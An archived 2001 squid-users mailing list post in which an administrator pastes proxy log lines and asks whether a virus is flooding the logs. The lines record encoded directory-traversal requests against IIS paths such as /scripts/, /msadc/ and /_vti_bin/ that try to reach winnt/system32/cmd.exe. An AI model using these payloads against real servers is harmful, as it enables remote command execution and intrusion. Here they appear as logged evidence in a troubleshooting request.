[squid-users] WinNT Server Access Problem

From: Arvin V. Carlos <spaceman@dont-contact.us>
Date: Wed, 19 Sep 2001 10:33:12 +0800 (PHT)

We have two NT 4.0 running IIS, suddenly our squid went down because of
disk space problme, we check our log files and it eats pur disk space
beacuse of our NT Machines try to resolv this all the time:

255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
? - DIRECT/www -
1000866350.455 1 208.142.136.115 TCP_MISS/503 1202 GET
http://www/scripts/.
.%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.487 1 208.142.136.115 TCP_MISS/503 1168 GET
http://www/c/winnt/s
ystem32/cmd.exe? - DIRECT/www -
1000866350.496 1 208.142.136.115 TCP_MISS/503 1168 GET
http://www/d/winnt/s
ystem32/cmd.exe? - DIRECT/www -
1000866350.505 2 208.142.136.115 TCP_MISS/503 1200 GET
http://www/scripts/.
.%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.514 2 208.142.136.115 TCP_MISS/503 1242 GET
http://www/_vti_bin/
..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.530 1 208.142.136.115 TCP_MISS/503 1242 GET
http://www/_mem_bin/
..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.539 2 208.142.136.115 TCP_MISS/503 1299 GET
http://www/msadc/..%
255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
? - DIRECT/www -
1000866350.548 2 208.142.136.115 TCP_MISS/503 1202 GET
http://www/scripts/.
.%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.557 1 208.142.136.115 TCP_MISS/503 1202 GET
http://www/scripts/.
.%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -

anyone can explain this? this is a virus? pls HELP!!!

-- 
===============================================================================
Arvin V. Carlos				  Office Phone: 
Linux System Administrator		  (047)237-6001/237-6002
Pccomshop Inc.		  		  http://www.pccomshop.com
                  -- Some people are afraid of nothing! --
===============================================================================
Received on Tue Sep 18 2001 - 20:49:48 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:02:16 MST